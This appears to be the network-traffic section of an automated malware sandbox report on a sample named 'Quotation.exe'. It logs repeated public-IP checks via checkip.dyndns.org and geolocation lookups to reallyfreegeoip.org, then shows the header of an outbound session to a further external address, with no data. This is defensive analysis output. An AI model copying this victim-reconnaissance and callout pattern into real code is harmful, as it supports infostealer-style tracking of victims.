                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  X-Request-ID: 5bf9243a1944e74950f3501842f97e7f
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.849719132.226.247.73802168C:\Users\user\Desktop\Quotation.exe
                                                  TimestampBytes transferredDirectionData
                                                  Oct 7, 2024 10:13:39.319396973 CEST151OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Connection: Keep-Alive
                                                  Oct 7, 2024 10:13:39.987910032 CEST320INHTTP/1.1 200 OK
                                                  Date: Mon, 07 Oct 2024 08:13:39 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  X-Request-ID: 1a5d3a9be7707feae2923668feab2dd3
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.849705188.114.96.34432168C:\Users\user\Desktop\Quotation.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-07 08:13:30 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-10-07 08:13:30 UTC686INHTTP/1.1 200 OK
                                                  Date: Mon, 07 Oct 2024 08:13:30 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 45145
                                                  Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=smW1bTnHfaFjhK4cQqlHe8FSA9NG7IiN3q3sWaaldm%2BaPru%2BkjwfDGNX%2FuqaSG11qL%2FvTu560U%2FbTixgIhAkMoDKWzNBL%2FYd7qqzsENi9m4vLZD5w8zaK%2BWArya9RH5eS0Vp%2Bivh"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8cec6ea9ae4c32f4-EWR
                                                  2024-10-07 08:13:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-10-07 08:13:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.849706188.114.96.34432168C:\Users\user\Desktop\Quotation.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-07 08:13:31 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  2024-10-07 08:13:31 UTC676INHTTP/1.1 200 OK
                                                  Date: Mon, 07 Oct 2024 08:13:31 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 45146
                                                  Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qCqvmXABYNygeGlPgSrRO82FuoYmZj2sfaOT0sOr%2BmQJBgsifxdlkuViH4GmoxuGVb7w1km1t6h20TCmzxCPT8r0wscvDuCbOjymPdqb%2FQvCLR%2FznhrkxWXVV19wf6rzggqbMtUe"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8cec6eaf2b184294-EWR
                                                  2024-10-07 08:13:31 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-10-07 08:13:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.849708188.114.96.34432168C:\Users\user\Desktop\Quotation.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-07 08:13:32 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-10-07 08:13:32 UTC678INHTTP/1.1 200 OK
                                                  Date: Mon, 07 Oct 2024 08:13:32 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 45147
                                                  Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mXjBcSTjWkNC287Jt2rUm%2BLZaQvNT2fnTY1PrETca30WYMoOtk1WxwJaFnSCKoysgiMlwtyFT6blS8slsYKy%2B6SoKxT2ZqYojIk7ns4RbKS2ZqY4TS%2FUds3ETaC%2FzZzKTCzjjuSF"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8cec6eb72b0341cf-EWR
                                                  2024-10-07 08:13:32 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-10-07 08:13:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.849710188.114.96.34432168C:\Users\user\Desktop\Quotation.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-07 08:13:33 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-10-07 08:13:34 UTC708INHTTP/1.1 200 OK
                                                  Date: Mon, 07 Oct 2024 08:13:34 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 45149
                                                  Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L7hfXsZSg8CQQzaFhVgUxfyfx5kGk6RUz9EUo%2FuTLxUot%2FyVMb8vIlly3OfTbVmZ76X%2Bnn6k7S7Mj82n3Hzk9eV0NioXxcF1HhmtyP6Gc9Mq78EMcxz8lD8RB7adR7Pf6j2cAA%2BF"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8cec6ebf6e0c0f8f-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-07 08:13:34 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-10-07 08:13:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.849712188.114.96.34432168C:\Users\user\Desktop\Quotation.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-07 08:13:35 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  2024-10-07 08:13:35 UTC676INHTTP/1.1 200 OK
                                                  Date: Mon, 07 Oct 2024 08:13:35 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 45150
                                                  Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j9Wki5zT%2FHHYLPn5D0FuXGzWywoAYKn1NM7Q55DvaYBlGg2ORlElp2OM%2FXyg3i4YfqbrSt55p8HoT%2FlQbiEfkLZGCL1ZJTicqASrXKs1nMerNBP8ajDrdub9Qsfz4SGlhKKz9hPh"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8cec6ec7d8e80f4a-EWR
                                                  2024-10-07 08:13:35 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-10-07 08:13:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.849714188.114.96.34432168C:\Users\user\Desktop\Quotation.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-07 08:13:36 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-10-07 08:13:36 UTC676INHTTP/1.1 200 OK
                                                  Date: Mon, 07 Oct 2024 08:13:36 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 45151
                                                  Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7NbuRw92w4r8Qm8udA1o%2FzW4qQQQ%2FBQ%2BWY9Jo8pChS8IsALnJSMMUeuXWBUIVv48JuvxIEZWk6IbjfpbvrXCUBtsdH9ahppJkRyXFJYHzJymYVx3hessAvqU4xoaDJdZyrouFqOu"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8cec6ecffcee43b9-EWR
                                                  2024-10-07 08:13:36 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-10-07 08:13:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.849716188.114.96.34432168C:\Users\user\Desktop\Quotation.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-07 08:13:37 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-10-07 08:13:38 UTC684INHTTP/1.1 200 OK
                                                  Date: Mon, 07 Oct 2024 08:13:37 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 45152
                                                  Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U2DNzCMGHX5ZhKH7tsYHUcsh%2FrXBwDWWZrKPRRqm8PoQ5uUJ5d%2BaT5I4iC0AiLfQ691C7j2nAxU%2BSDIDY2WJo%2BzRscTsHm1jNtdEcHVAC2ysVHNmbyci%2B%2FPTmrP%2FHcnppNNS7mPY"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8cec6ed8195f1977-EWR
                                                  2024-10-07 08:13:38 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-10-07 08:13:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.849718188.114.96.34432168C:\Users\user\Desktop\Quotation.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-07 08:13:39 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-10-07 08:13:39 UTC674INHTTP/1.1 200 OK
                                                  Date: Mon, 07 Oct 2024 08:13:39 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 45154
                                                  Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9VsMG2yaJj6nipB7%2Ben2ooOFgn6x8YS9%2BAGismjdSd1DsZNPys8J7B25aHonSsnVqOzBEsvH8O7TYXnjTVqIbgBEiLjFBof41UK4QiA5UAJnVDr1h60Hmbg5L1ka5femMJXxV0V5"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8cec6ee05bb0423a-EWR
                                                  2024-10-07 08:13:39 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-10-07 08:13:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.849720188.114.96.34432168C:\Users\user\Desktop\Quotation.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-07 08:13:40 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-10-07 08:13:40 UTC706INHTTP/1.1 200 OK
                                                  Date: Mon, 07 Oct 2024 08:13:40 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 45155
                                                  Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8NSlhK9bbgtrwpsHeC5fZUEuwbLWo5kr0x2prXRNvZPPXWvd7iVygdlc5gcFwM02wv4VnG5V%2BWeKb5o%2BSyOnZMecWeuSWM5NL9l1zleqgyd%2BEeSNPoGG4xoJUVeXRvKwpOShxTP3"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8cec6ee87ca318ee-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-07 08:13:40 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-10-07 08:13:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.849721149.154.167.2204432168C:\Users\user\Desktop\Quotation.exe
                                                  TimestampBytes transferredDirectionData
